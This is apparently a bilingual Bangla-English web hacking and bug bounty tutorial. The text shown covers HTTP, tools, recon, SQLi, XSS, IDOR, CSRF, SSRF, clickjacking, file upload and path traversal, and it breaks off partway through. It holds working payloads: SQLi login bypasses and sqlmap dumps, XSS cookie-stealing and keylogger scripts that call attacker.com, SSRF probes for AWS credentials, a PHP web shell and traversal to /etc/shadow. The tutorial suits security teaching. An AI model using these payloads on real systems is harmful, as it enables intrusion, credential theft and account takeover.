🕷️

Web Hacking & Bug Bounty

সম্পূর্ণ গাইড — Zero থেকে Hunter পর্যন্তComplete Guide — Zero to Hunter

ওয়েব অ্যাপ্লিকেশন কিভাবে কাজ করে সেটা জানো না? কোনো সমস্যা নেই। এই গাইড তোমাকে HTTP থেকে শুরু করে OWASP Top 10, Burp Suite ব্যবহার এবং Bug Bounty Report লেখা পর্যন্ত সব শেখাবে। Don't know how web apps work? No problem. This guide takes you from HTTP all the way to OWASP Top 10, using Burp Suite, and writing Bug Bounty reports.

⚠️ শুধু Authorized টার্গেটে 📖 13 Chapters 🕷️ OWASP Top 10 🌙 Dark Mode 🇧🇩 বাংলা / 🇬🇧 English
terminal
$ whoami
ethical_hacker
$ nmap -sV target.com
Starting Nmap scan...
$ sqlmap -u "http://target.com?id=1"
⚠ Only on authorized targets!
📋 সূচিপত্রTable of Contents
01Web Hacking পরিচিতি ও নৈতিকতাWeb Hacking Intro & EthicsCh. 1
Ethical Hacking কী, আইনি সীমা, Bug Bounty কীWhat is ethical hacking, legal limits, what is Bug Bounty
02HTTP ও ওয়েব কিভাবে কাজ করেHTTP & How the Web WorksCh. 2
Request, Response, Headers, Cookies, SessionsRequest, Response, Headers, Cookies, Sessions
03Tools Setup — Burp Suite, Kali, ReconTools Setup — Burp Suite, Kali, ReconCh. 3
Burp Suite, Kali Linux, ffuf, nmap সেটআপSetting up Burp Suite, Kali Linux, ffuf, nmap
04Reconnaissance — তথ্য সংগ্রহReconnaissance — Information GatheringCh. 4
Passive & Active Recon, subdomain enumeration, Google DorkPassive & Active Recon, subdomain enumeration, Google Dork
05SQL Injection (SQLi)SQL Injection (SQLi)Ch. 5
Database ভাঙা — সবচেয়ে বিপজ্জনক vulnerabilityBreaking databases — the most dangerous vulnerability
06Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)Ch. 6
Reflected, Stored, DOM — JavaScript inject করাReflected, Stored, DOM — injecting JavaScript
07Broken Authentication & IDORBroken Authentication & IDORCh. 7
লগইন bypass, IDOR দিয়ে অন্যের ডেটা দেখাLogin bypass, viewing others' data via IDOR
08CSRF, SSRF ও ClickjackingCSRF, SSRF & ClickjackingCh. 8
ব্যবহারকারীকে ফাঁদে ফেলা — request forgeryTrapping the user — request forgery
09File Upload ও Path TraversalFile Upload & Path TraversalCh. 9
Malicious file upload, directory traversal দিয়ে ফাইল পড়াMalicious file upload, reading files via directory traversal
10Business Logic BugsBusiness Logic BugsCh. 10
Scanner ধরতে পারে না এমন বাগ — price manipulation, race conditionBugs scanners can't find — price manipulation, race condition
11Burp Suite — Deep DiveBurp Suite — Deep DiveCh. 11
Proxy, Scanner, Intruder, Repeater, Decoder বিস্তারিতProxy, Scanner, Intruder, Repeater, Decoder in detail
12Bug Bounty — শুরু থেকে Report পর্যন্তBug Bounty — From Start to ReportCh. 12
HackerOne, Bugcrowd, scope, report লেখা, CVSS scoreHackerOne, Bugcrowd, scope, writing reports, CVSS score
13Practice Lab ও RoadmapPractice Labs & RoadmapCh. 13
DVWA, PortSwigger, TryHackMe, HackTheBox — কোথায় প্র্যাকটিস করবোDVWA, PortSwigger, TryHackMe, HackTheBox — where to practice
CHAPTER 01
⚖️ Web Hacking পরিচিতি ও নৈতিকতাWeb Hacking Introduction & Ethics
Ethical Hacking কী, আইনি সীমা, Bug Bounty কী এবং কেন শিখবোWhat is ethical hacking, legal limits, what is Bug Bounty and why learn

🤔 Hacking মানেই কি খারাপ?Is Hacking Always Bad?

না! Hacking আসলে দক্ষতার সাথে সিস্টেম বোঝা এবং পরীক্ষা করা। Hacking তিন ধরনের:No! Hacking is actually about understanding and testing systems skillfully. There are three types of hacking:

🟢 White Hat

Ethical Hacker। অনুমতি নিয়ে সিস্টেম পরীক্ষা করে এবং বাগ রিপোর্ট করে। Bug Bounty Hunter = White Hat।Ethical Hacker. Tests systems with permission and reports bugs. Bug Bounty Hunter = White Hat.

🟡 Grey Hat

অনুমতি ছাড়া পরীক্ষা করে, কিন্তু ক্ষতি করে না। সিস্টেম মালিককে জানায়। আইনত ঝুঁকিপূর্ণ।Tests without permission but doesn't cause damage. Notifies the owner. Legally risky.

🔴 Black Hat

অনুমতি ছাড়া সিস্টেমে ঢোকে এবং ক্ষতি করে বা চুরি করে। এটা অপরাধ — জেল হতে পারে।Accesses systems without permission and causes harm or steals. This is a crime — you can go to jail.

⚖️ বাংলাদেশে আইন — ডিজিটাল নিরাপত্তা আইন ২০১৮Law in Bangladesh — Digital Security Act 2018
অনুমতি ছাড়া কারো সিস্টেমে প্রবেশ করলে সর্বোচ্চ ১৪ বছরের কারাদণ্ড এবং কোটি টাকার জরিমানা হতে পারে। সবসময় authorized target-এ practice করো। Unauthorized access to someone's system can result in up to 14 years imprisonment and massive fines. Always practice on authorized targets.

💰 Bug Bounty কী?What is Bug Bounty?

বড় বড় কোম্পানি (Google, Facebook, Microsoft) তাদের সিস্টেমের দুর্বলতা খুঁজে বের করার জন্য Ethical Hacker-দের পুরস্কার (Bounty) দেয়। এটাই Bug Bounty।Big companies (Google, Facebook, Microsoft) pay rewards (Bounty) to ethical hackers for finding vulnerabilities in their systems. This is Bug Bounty.

💵 কত টাকা পাওয়া যায়?How Much Can You Earn?

SeverityReward
Critical$5,000 – $100,000+
High$1,000 – $10,000
Medium$250 – $1,000
Low$50 – $500

🏆 জনপ্রিয় PlatformPopular Platforms

  • 🔴 HackerOne — hackerone.com
  • 🟠 Bugcrowd — bugcrowd.com
  • 🔵 Intigriti — intigriti.com
  • 🟢 Synack — synack.com
  • 🟡 YesWeHack — yeswehack.com

📋 Bug Bounty-র নিয়মBug Bounty Rules

⚠️ এগুলো না মানলে Bounty পাবে না — আইনি সমস্যাও হতে পারে!Break these rules and you won't get paid — and may face legal trouble!
  • শুধু in-scope টার্গেটে কাজ করোOnly work on in-scope targets
  • User data নষ্ট বা চুরি করো নাDon't destroy or steal user data
  • বাগ পেলে সাথে সাথে রিপোর্ট করো, exploit করো নাReport bugs immediately, don't exploit them
  • Production system-এ automated scanner চালিও নাDon't run automated scanners on production systems
  • Publicly disclose করার আগে কোম্পানিকে সময় দাওGive the company time before public disclosure

📌 Chapter সারসংক্ষেপChapter Summary

  • 🟢 White Hat = Ethical Hacker = আইনি, অনুমতিসহWhite Hat = Ethical Hacker = legal, with permission
  • 💰 Bug Bounty = কোম্পানির বাগ খুঁজে পুরস্কার পাওয়াBug Bounty = finding company bugs and getting rewarded
  • ⚖️ সবসময় authorized target-এ কাজ করোAlways work on authorized targets only
  • 🏆 HackerOne, Bugcrowd, Intigriti — শুরু করার জায়গাplaces to start
CHAPTER 02
🌐 HTTP ও ওয়েব কিভাবে কাজ করেHTTP & How the Web Works
Request, Response, Headers, Status Codes, Cookies — Hacker-এর দৃষ্টিতেRequest, Response, Headers, Status Codes, Cookies — from a hacker's perspective

🔄 ব্রাউজার থেকে সার্ভার — কী হয়?Browser to Server — What Happens?

তুমি browser-এ টাইপ করো: https://example.com/login

Browser (Client)          ←→           Server

Step 1: DNS Lookup
  example.com93.184.216.34 (IP address)

Step 2: TCP Connection (3-way handshake)
  Client → SYN → Server
  Client ← SYN-ACK ← Server
  Client → ACK → Server

Step 3: TLS Handshake (HTTPS)
  SSL Certificate exchange, encryption setup

Step 4: HTTP Request পাঠানো
  GET /login HTTP/1.1

Step 5: HTTP Response পাওয়া
  200 OK + HTML page

Step 6: Browser HTML render করে

📤 HTTP Request — ব্রাউজার কী পাঠায়What the Browser Sends

HTTP REQUEST
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=abc123xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Length: 38
username=admin&password=pass1234

📥 HTTP Response — সার্ভার কী পাঠায়What the Server Sends Back

HTTP RESPONSE
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: session=newtoken456; HttpOnly; Secure
X-Frame-Options: DENY
Server: nginx/1.18.0
<html> <body> স্বাগতম, admin! </body> </html>

📊 HTTP Status Codes — সার্ভারের জবাবServer's Reply

Codeঅর্থMeaningHacker দৃষ্টিতেperspective
200 OKসফলSuccessপেলাম! তথ্য বিশ্লেষণ করোGot it! Analyze the data
301/302RedirectRedirectনতুন URL-এ যাওGo to new URL
400Bad RequestBad Requestভুল input — payload ঠিক করোWrong input — fix your payload
401UnauthorizedUnauthorizedLogin দরকারNeed to log in
403ForbiddenForbiddenAccess নেই — bypass চেষ্টা করোNo access — try to bypass
404Not FoundNot Foundপেলাম না — অন্য path চেষ্টা করোNot found — try other paths
500Server ErrorServer Error🔥 সার্ভার crash — vulnerability আছে!🔥 Server crash — vulnerability found!

🍪 Cookies ও Sessions — পরিচয় মনে রাখাRemembering Identity

HTTP stateless — প্রতিটা request আলাদা। তাই Cookie/Session দিয়ে login state মনে রাখা হয়।HTTP is stateless — every request is separate. So Cookies/Sessions remember login state.

🍪 Cookie

  • Browser-এ সংরক্ষিতStored in browser
  • প্রতি request-এ পাঠানো হয়Sent with every request
  • Hacker চুরি করলে account দখল!If hacker steals it → account takeover!
  • HttpOnlyJS পড়তে পারবে নাJS can't read
  • Secureশুধু HTTPS-এHTTPS only

⚠️ Hacker কী দেখে?What Does a Hacker Look For?

  • Cookie-তে predictable value?Predictable value in cookie?
  • HttpOnly flag নেই? → XSS দিয়ে চুরি!No HttpOnly flag? → Steal with XSS!
  • Secure flag নেই? → HTTP-তে দেখা যাবেNo Secure flag? → Visible over HTTP
  • Session fixation possible?Session fixation possible?

🔍 Security Headers — কী থাকা উচিতSecurity Headers — What Should Exist

HeaderকাজPurposeনা থাকলেIf Missing
X-Frame-OptionsIframe থেকে রক্ষাProtection from iframeClickjacking
Content-Security-PolicyScript execution নিয়ন্ত্রণControl script executionXSS সহজ
Strict-Transport-Securityশুধু HTTPSHTTPS onlyMitM Attack
X-Content-Type-OptionsMIME sniffing বন্ধDisable MIME sniffingMIME attack

📌 Chapter সারসংক্ষেপChapter Summary

  • 🔄 Browser → DNS → TCP → HTTP Request → Response
  • 📤 Request-এ: Method, Path, Headers, BodyIn Request: Method, Path, Headers, Body
  • 📊 500 error মানে server crash → vulnerability!500 error means server crash → vulnerability!
  • 🍪 Cookie চুরি = Account TakeoverCookie theft = Account Takeover
  • 🔒 Security Headers না থাকলে vulnerabilityMissing Security Headers = vulnerability
CHAPTER 03
🛠️ Tools SetupTools Setup
Burp Suite, Kali Linux, Nmap, ffuf — Hacker-এর অস্ত্রভাণ্ডার সাজানোBurp Suite, Kali Linux, Nmap, ffuf — setting up the hacker's arsenal

🎯 কোন Tool কখন ব্যবহার করবো?Which Tool for What?

ToolকাজPurposeকখনWhen
Burp SuiteHTTP traffic intercept, manipulateসবসময় — সবচেয়ে গুরুত্বপূর্ণAlways — most important
NmapPort scan, service detectRecon phase-এIn recon phase
ffuf / gobusterDirectory/file bruteforceHidden path খুঁজতেFinding hidden paths
sqlmapSQL injection automationSQLi confirm করতেConfirming SQLi
niktoWeb server scanQuick vulnerability check
subfinder / amassSubdomain enumerationScope বাড়াতেExpanding scope
WappalyzerTechnology detectionStack জানতেKnowing the stack

🦆 Burp Suite Setup

Burp Suite হলো Web Hacking-এর সবচেয়ে গুরুত্বপূর্ণ tool। এটা Browser ও Server-এর মাঝখানে বসে traffic দেখে এবং modify করে।Burp Suite is the most important tool in web hacking. It sits between the browser and server, viewing and modifying traffic.

1
Download: portswigger.net/burp — Community Edition ফ্রিis free
2
Browser Proxy: Browser-এ FoxyProxy বা Proxy extension ইনস্টল করো। Burp-এর proxy 127.0.0.1:8080 সেট করো।Install FoxyProxy or Proxy extension in browser. Set Burp's proxy to 127.0.0.1:8080.
3
SSL Certificate: http://burpsuite তে গিয়ে Burp-এর CA certificate ডাউনলোড ও install করো।Go to http://burpsuite, download and install Burp's CA certificate.
4
Intercept: Proxy → Intercept → On করো। এখন browser-এর request Burp-এ আটকাবে।Proxy → Intercept → Turn On. Now browser requests will be intercepted in Burp.
Browser ←→ Burp Suite Proxy (127.0.0.1:8080) ←→ Server

Burp Suite-এর গুরুত্বপূর্ণ Modules:
Proxy     → Request intercept করো ও modify করো
Repeater  → একই request বারবার পাঠাও (manually)
Intruder  → Automated attack (brute force, fuzzing)
Scanner   → Automatic vulnerability scan (Pro only)
Decoder   → Base64, URL encode/decode
Comparer  → দুটো response তুলনা করো

🗺️ Nmap — Port ও Service খোঁজাFinding Ports & Services

# Basic scan $ nmap target.com # Service version detect $ nmap -sV target.com # All ports scan $ nmap -p- target.com # OS detect + script scan $ nmap -A target.com # Stealth scan $ nmap -sS target.com
⬇ EXAMPLE OUTPUT
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2 80/tcp open http nginx 1.18.0 443/tcp open https nginx 1.18.0 3306/tcp open mysql MySQL 5.7.36

📁 ffuf — লুকানো Directory খোঁজাFinding Hidden Directories

# Directory bruteforce $ ffuf -w /usr/share/wordlists/dirb/common.txt \ -u https://target.com/FUZZ # Extension সহ $ ffuf -w wordlist.txt -u https://target.com/FUZZ \ -e .php,.html,.txt,.bak # Subdomain brute force $ ffuf -w subdomains.txt \ -u https://FUZZ.target.com \ -H "Host: FUZZ.target.com"
⬇ EXAMPLE OUTPUT
admin [Status: 200, Size: 4521] backup.php [Status: 200, Size: 892] .git [Status: 403, Size: 150] config.bak [Status: 200, Size: 234]
💡 Wordlist কোথায় পাবো?Where to Find Wordlists?
  • SecLists — github.com/danielmiessler/SecLists (সবচেয়ে ভালোthe best)
  • Kali-তে built-in: /usr/share/wordlists/
  • rockyou.txtpassword cracking-এর জন্যfor password cracking

📌 Chapter সারসংক্ষেপChapter Summary

  • 🦆 Burp Suite = Web Hacking-এর সবচেয়ে গুরুত্বপূর্ণ toolBurp Suite = most important web hacking tool
  • 🗺️ Nmap = কোন port খোলা, কোন service চলছেNmap = which ports are open, which services are running
  • 📁 ffuf = লুকানো directory ও file খোঁজাffuf = finding hidden directories and files
  • 📚 SecLists = সেরা wordlist collectionSecLists = best wordlist collection
CHAPTER 04
🔭 Reconnaissance — তথ্য সংগ্রহReconnaissance — Information Gathering
Attack শুরুর আগে যতটা সম্ভব তথ্য জমানো — Passive ও Active ReconGathering as much information as possible before attacking — Passive & Active Recon

📡 Passive Recon — কোনো ছোঁয়া না দিয়েPassive Recon — Without Touching the Target

Passive Recon-এ সরাসরি target-এ কোনো request পাঠাই না। Public source থেকে তথ্য সংগ্রহ করি।In Passive Recon we don't send any requests to the target. We collect information from public sources.

🔍 Google Dorking

Google-এর advanced search operator ব্যবহার করে sensitive তথ্য খোঁজা।Using Google's advanced search operators to find sensitive information.

Dorkকী খোঁজেWhat it findsউদাহরণExample
site:নির্দিষ্ট সাইটে খোঁজSearch within sitesite:target.com
filetype:ফাইল ধরনFile typesite:target.com filetype:pdf
inurl:URL-এ কিছু আছেURL containsinurl:admin site:target.com
intitle:Title-এ কিছু আছেTitle containsintitle:"index of" site:target.com
intext:Page-এ কিছু আছেPage containsintext:"sql syntax" site:target.com
cache:Google-এর cached versionGoogle's cached versioncache:target.com
# Sensitive file খোঁজার দরকারি dork / Useful dorks for sensitive files site:target.com filetype:sql # SQL dump site:target.com filetype:env # .env file (API keys!) site:target.com "index of /" # Directory listing site:target.com inurl:"/admin" # Admin panel site:target.com inurl:"phpinfo.php" # PHP info site:target.com "password" filetype:txt # Password files

🌐 Subdomain Enumeration

# subfinder দিয়ে $ subfinder -d target.com -o subdomains.txt # amass দিয়ে $ amass enum -d target.com # crt.sh থেকে (certificate transparency) $ curl https://crt.sh/?q=%.target.com&output=json | jq # DNS bruteforce $ ffuf -w subdomains-wordlist.txt \ -u https://FUZZ.target.com

🔎 WHOIS ও DNS InformationWHOIS & DNS Information

# WHOIS — কার সাইট, কখন নিবন্ধন $ whois target.com # DNS records $ dig target.com ANY $ nslookup target.com $ host target.com # দরকারি DNS record types # A → IP address # MX → Mail server # TXT → SPF, DKIM, verification # CNAME → Alias (subdomain takeover!)

🎯 Active Recon — সরাসরি পরীক্ষাActive Recon — Direct Testing

⚠️
Active Recon সরাসরি target-এ request পাঠায়। শুধু authorized target-এ করো।Active Recon sends requests directly to the target. Only do this on authorized targets.
# Web technology detect করা $ whatweb target.com $ wappalyzer # browser extension # HTTP headers দেখা $ curl -I https://target.com # robots.txt দেখা — লুকানো path থাকতে পারে! $ curl https://target.com/robots.txt # sitemap দেখা $ curl https://target.com/sitemap.xml
⬇ robots.txt EXAMPLE — এটা দেখলে attack surface বাড়ে!
User-agent: * Disallow: /admin/ Disallow: /backup/ Disallow: /api/internal/ Disallow: /config/
💡 Pro Tip: Wayback Machine
web.archive.org থেকে পুরনো version-এ হয়তো sensitive information আছে, বা এখন remove করা হয়েছে এমন endpoint পাবে। web.archive.org old versions may have sensitive information or removed endpoints that still exist on the server.

📌 Chapter সারসংক্ষেপChapter Summary

  • 🔍 Google Dork = Public source থেকে sensitive infoGoogle Dork = sensitive info from public sources
  • 🌐 Subdomain enum = বেশি attack surfaceSubdomain enum = more attack surface
  • 📄 robots.txt = হয়তো লুকানো path-এর list!robots.txt = possibly a list of hidden paths!
  • Wayback Machine = পুরনো sensitive contentWayback Machine = old sensitive content
CHAPTER 05
💉 SQL Injection (SQLi)
Database-কে ধোঁকা দিয়ে unauthorized data বের করা — OWASP Top 1Tricking the database into revealing unauthorized data — OWASP Top 1

🤔 SQL Injection কী?

ওয়েব অ্যাপ্লিকেশন যখন user-এর input সরাসরি SQL query-তে ঢুকিয়ে দেয়, তখন attacker ইচ্ছামতো SQL command inject করতে পারে।When a web application directly inserts user input into an SQL query, an attacker can inject arbitrary SQL commands.

🔴 Vulnerable Code

CRITICAL
# ভুল — user input সরাসরি query-তে username = request.get("username") query = "SELECT * FROM users WHERE username = '" + username + "'" # username = admin'-- দিলে কী হয়? # Query হয়: SELECT * FROM users WHERE username = 'admin'--' # -- মানে comment → password check skip!

🧪 SQLi Test করার উপায়How to Test for SQLi

# Step 1: Single quote দিয়ে test করো https://target.com/item?id=1' # Error আসলে → SQLi হতে পারে! # "You have an error in your SQL syntax" → confirmed! # Step 2: Boolean based test https://target.com/item?id=1 AND 1=1 # Normal response https://target.com/item?id=1 AND 1=2 # Different response → SQLi! # Step 3: Time based (blind) https://target.com/item?id=1; SLEEP(5)-- # 5 সেকেন্ড দেরি হলে → SQLi confirmed!

💣 Common SQLi PayloadsCommon SQLi Payloads

-- Login Bypass -- admin'-- admin' # ' OR '1'='1 admin'/* ' OR 1=1-- " OR ""=" -- UNION based (data extraction) -- 1' ORDER BY 3-- # column count বের করা 1' UNION SELECT NULL,NULL,NULL-- 1' UNION SELECT username,password,3 FROM users-- -- Database information -- 1' UNION SELECT @@version,NULL,NULL-- # DB version 1' UNION SELECT database(),NULL,NULL-- # DB name 1' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--

🤖 SQLMap — AutomationAutomation

# Basic SQLMap $ sqlmap -u "https://target.com/item?id=1" # সব database দেখো $ sqlmap -u "https://target.com/item?id=1" --dbs # নির্দিষ্ট database-এর tables $ sqlmap -u "https://target.com/item?id=1" -D targetdb --tables # নির্দিষ্ট table-এর data $ sqlmap -u "https://target.com/item?id=1" -D targetdb -T users --dump # POST request-এ SQLi $ sqlmap -u "https://target.com/login" \ --data "username=admin&password=test" \ -p username
⚠️ শুধু authorized target-এ SQLMap চালাওOnly run SQLMap on authorized targets
SQLMap automated tool — production server-এ চালালে crash করতে পারে এবং আইনি সমস্যা হতে পারে। SQLMap is automated — running on production may crash it and cause legal problems.

📌 Chapter সারসংক্ষেপChapter Summary

  • 💉 SQLi = user input SQL query-তে inject হলেSQLi = when user input gets injected into SQL query
  • 🧪 Test: single quote ' দিয়ে শুরু করোTest: start with single quote '
  • 🔑 Login bypass: ' OR '1'='1
  • 🤖 SQLMap = automated SQLi testing
  • 🔒 Fix: Parameterized queries ব্যবহার করোFix: Use parameterized queries
CHAPTER 06
🔮 Cross-Site Scripting (XSS)
ওয়েবসাইটে JavaScript inject করে victim-এর browser-এ কোড চালানোInjecting JavaScript into a website to run code in the victim's browser

🤔 XSS কী?

XSS হয় যখন ওয়েবসাইট user-এর input sanitize না করে সরাসরি page-এ দেখায়। এতে attacker JavaScript code inject করতে পারে যা অন্য user-এর browser-এ চলে।XSS occurs when a website displays user input directly on the page without sanitizing it. This allows an attacker to inject JavaScript that runs in other users' browsers.

🔴 Reflected XSS

URL-এ payload থাকে। ব্যবহারকারী link-এ click করলে তাৎক্ষণিক execute হয়। Server-এ store হয় না।Payload is in the URL. Executes immediately when user clicks the link. Not stored on server.

🟠 Stored XSS

Comment, profile-এ payload store হয়। যে কেউ page দেখলেই execute হয়। সবচেয়ে বিপজ্জনক।Payload stored in comments, profiles. Executes for everyone who views the page. Most dangerous.

🟣 DOM XSS

Server-এর সাথে কোনো সম্পর্ক নেই। JavaScript নিজেই DOM manipulate করার সময় হয়।No server involvement. Happens when JavaScript manipulates the DOM unsafely.

🧪 XSS Testing Payloads

-- Basic test -- <script>alert(1)</script> <script>alert('XSS')</script> <img src=x onerror=alert(1)> -- Filter bypass -- <ScRiPt>alert(1)</ScRiPt> # case variation <svg onload=alert(1)> # SVG tag <body onload=alert(1)> javascript:alert(1) # href-এ <img src="x" onerror="alert(document.cookie)"> -- Cookie steal করার payload -- <script> document.location='https://attacker.com/steal?c='+document.cookie </script> -- Keylogger payload -- <script> document.onkeypress = function(e) { fetch('https://attacker.com/log?k=' + e.key); } </script>

🔍 XSS কোথায় খুঁজবো?Where to Look for XSS?

🛡️ XSS ঠেকানোর উপায়How to Prevent XSS
  • Output encode করো: <&lt;
  • Content Security Policy (CSP) header দাওAdd Content Security Policy (CSP) header
  • Cookie-তে HttpOnly flag দাওAdd HttpOnly flag to cookies
  • DOMPurify library ব্যবহার করোUse DOMPurify library

📌 Chapter সারসংক্ষেপChapter Summary

  • 🔮 XSS = অন্যের browser-এ JavaScript চালানোXSS = running JavaScript in someone else's browser
  • 🔴 Reflected = URL-এ, Stored = Database-এ, DOM = JavaScript-এ
  • 🍪 Cookie steal করে Account Takeover সম্ভবStealing cookies enables Account Takeover
  • 🧪 Basic test: <script>alert(1)</script>
CHAPTER 07
🔐 Broken Authentication ও IDORBroken Authentication & IDOR
Login bypass, অন্যের account দেখা এবং Insecure Direct Object ReferenceLogin bypass, viewing others' accounts and Insecure Direct Object Reference

🔑 Broken AuthenticationBroken Authentication

Authentication যদি দুর্বলভাবে implement করা হয়, তাহলে attacker account দখল করতে পারে।If authentication is poorly implemented, an attacker can take over accounts.

দুর্বলতাWeaknessআক্রমণAttackউদাহরণExample
Rate limiting নেইNo rate limitingBrute Forceলক্ষ লক্ষ password tryTrying millions of passwords
দুর্বল password policyWeak password policyCredential Stuffingleaked password list ব্যবহারUsing leaked password lists
Predictable tokenPredictable tokenToken PredictionReset token = timestampReset token = timestamp
JWT misconfigurationAlgorithm confusionalg: none
Default credentialsLoginadmin:admin

Brute Force — Burp Intruder দিয়েBrute Force — with Burp Intruder

1
Login request Burp-এ intercept করোIntercept login request in Burp
2
Right click → Send to Intruder
3
Password field-এ § চিহ্ন দাও (position mark)Mark the password field with § (position mark)
4
Payload → wordlist লোড করো → Attack!

🆔 IDOR — অন্যের Data দেখাViewing Others' Data

IDOR (Insecure Direct Object Reference) হয় যখন server user-এর permission check না করে শুধু ID দিয়ে data দিয়ে দেয়।IDOR occurs when the server gives data based only on an ID without checking the user's permission.

🆔 IDOR Example

HIGH
# তোমার profile URL https://target.com/api/user/1337/profile ^^^^ তোমার user ID # ID 1338 try করলে অন্যের profile দেখা যায়? https://target.com/api/user/1338/profile # অন্য IDOR targets https://target.com/invoice?id=1001 # → id=1002? https://target.com/download?file=user1337.pdf https://target.com/api/orders/5678
# Burp Intruder দিয়ে IDOR test # Request: GET /api/user/§1337§/data # Payload type: Numbers, From 1 to 10000 # Response length compare করো — আলাদা হলে IDOR! # UUID/GUID-এ IDOR? https://target.com/api/user/550e8400-e29b-41d4-a716-446655440000 # এগুলো random দেখালেও কখনো predictable হয়
💰 IDOR Bug Bounty-তে অনেক পাওয়া যায়!IDOR earns a lot in Bug Bounty!
IDOR সহজে পাওয়া যায় এবং impact বেশি হওয়ায় Bug Bounty-তে $500 থেকে $10,000+ পাওয়া সাধারণ। IDOR is easy to find and has high impact, so earning $500 to $10,000+ in Bug Bounty is common.

📌 Chapter সারসংক্ষেপChapter Summary

  • 🔑 Broken Auth = দুর্বল login → account takeoverBroken Auth = weak login → account takeover
  • 🔢 Brute Force = Burp Intruder + wordlist
  • 🆔 IDOR = ID বদলে অন্যের data দেখা যায়?IDOR = change ID to see others' data?
  • 💰 IDOR = Bug Bounty-তে সহজ এবং ভালো rewardIDOR = easy find and good reward in Bug Bounty
CHAPTER 08
🎭 CSRF, SSRF & Clickjacking
ব্যবহারকারীকে বা সার্ভারকে ফাঁদে ফেলানো — Request Forgery AttacksTrapping the user or server — Request Forgery Attacks

🎭 CSRF — ব্যবহারকারীকে দিয়ে কাজ করানোForcing Users to Perform Actions

CSRF (Cross-Site Request Forgery) হয় যখন attacker victim-কে একটা malicious link-এ click করায় এবং victim-এর browser স্বয়ংক্রিয়ভাবে target site-এ request পাঠায় (victim-এর cookie সহ)।CSRF occurs when an attacker tricks a victim into clicking a malicious link, and the victim's browser automatically sends a request to the target site (with the victim's cookies).

🎭 CSRF Attack Flow

HIGH
Victim ← bank.com-এ logged in

Attacker একটা evil page বানায়:
<img src="https://bank.com/transfer?to=attacker&amount=10000">

Victim evil page দেখে → Browser automatically request পাঠায়
→ bank.com victim-এর cookie দেখে → Transfer হয়ে যায়!

Fix: CSRF Token — random hidden value যা attacker জানে না
# CSRF test করার পদ্ধতি # 1. Burp-এ sensitive request intercept করো (password change, etc.) # 2. Engagement tools → Generate CSRF PoC # 3. HTML PoC তৈরি হবে: <html> <form action="https://target.com/change-email" method="POST"> <input type="hidden" name="email" value="attacker@evil.com"/> <input type="submit" value="Click me!"/> </form> <script>document.forms[0].submit()</script> </html> # CSRF Token আছে কিনা দেখো — না থাকলে vulnerable!

🖥️ SSRF — সার্ভারকে দিয়ে request করানোMaking the Server Fetch Resources

SSRF (Server-Side Request Forgery)-তে attacker server-কে internal network-এ বা cloud metadata-তে request পাঠাতে বাধ্য করে।In SSRF, the attacker forces the server to make requests to internal networks or cloud metadata endpoints.

# SSRF test payload https://target.com/fetch?url=http://127.0.0.1/ https://target.com/fetch?url=http://localhost/admin https://target.com/fetch?url=http://192.168.1.1/ # AWS Cloud Metadata (Cloud SSRF) https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/ https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # এই URL থেকে AWS credentials পাওয়া যেতে পারে! # SSRF bypass techniques http://0x7f000001/ # 127.0.0.1 hex http://2130706433/ # 127.0.0.1 decimal http://127.1/ # shortened

👆 Clickjacking

Target site-কে একটা transparent iframe-এ লোড করে victim-কে অজান্তে button-এ click করানো।Loading the target site in a transparent iframe to trick the victim into unknowingly clicking buttons.

# Clickjacking test — X-Frame-Options নেই? <style> iframe { opacity: 0.5; position: absolute; top: 0; left: 0; } </style> <iframe src="https://target.com/delete-account" width=800 height=600></iframe> <button style="position:absolute; top:300px; left:400px"> Win a Prize! </button> # X-Frame-Options: DENY থাকলে এটা কাজ করবে না

📌 Chapter সারসংক্ষেপChapter Summary

  • 🎭 CSRF = victim-কে দিয়ে অজান্তে action করানোCSRF = making victim unknowingly perform actions
  • 🖥️ SSRF = server-কে দিয়ে internal request করানোSSRF = making server send internal requests
  • 👆 Clickjacking = transparent iframe দিয়ে ধোঁকাClickjacking = tricking with transparent iframe
  • 🔒 Fix: CSRF Token, SameSite Cookie, X-Frame-Options
CHAPTER 09
📁 File Upload ও Path TraversalFile Upload & Path Traversal
Malicious file upload করে RCE পাওয়া এবং directory traversal দিয়ে ফাইল পড়াGetting RCE via malicious file upload and reading files via directory traversal

📤 File Upload Vulnerabilities

অনেক সাইটে ফাইল upload করার সুবিধা থাকে (profile picture, document)। যদি proper validation না থাকে, তাহলে PHP/ASP shell upload করে Remote Code Execution (RCE) পাওয়া সম্ভব।Many sites allow file uploads (profile picture, document). Without proper validation, it's possible to upload a PHP/ASP shell and get Remote Code Execution (RCE).

-- PHP Web Shell -- # shell.php নামে এই file upload করো <?php system($_GET['cmd']); ?> # Upload হলে access করো: https://target.com/uploads/shell.php?cmd=whoami https://target.com/uploads/shell.php?cmd=ls+-la https://target.com/uploads/shell.php?cmd=cat+/etc/passwd -- Filter bypass techniques -- shell.php → shell.php.jpg # double extension shell.php → shell.pHp # case variation shell.php → shell.php5 # alternate extension shell.php → shell.php%00.jpg # null byte # Content-Type bypass # Burp-এ intercept করে Content-Type: image/jpeg বানাও # কিন্তু body-তে PHP code রাখো

🗂️ Path Traversal — Directory ভেদ করে ফাইল পড়াReading Files Across Directories

Server যদি user-দেওয়া file path sanitize না করে, তাহলে ../ দিয়ে server-এর যেকোনো ফাইল পড়া সম্ভব।If the server doesn't sanitize user-provided file paths, using ../ can read any file on the server.

# Basic path traversal https://target.com/file?name=../../../etc/passwd https://target.com/file?name=../../../etc/shadow https://target.com/file?name=../../../var/www/html/config.php # Windows path https://target.com/file?name=..\..\..\windows\system32\drivers\etc\hosts -- Bypass techniques -- ../..%2f # URL encode ../....// # double dot ../..%252f # double encode ../%2e%2e%2f # full encode
⬇ /etc/passwd এর মতো দেখতে পাবে
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
🔥 File Upload + Path Traversal = RCE
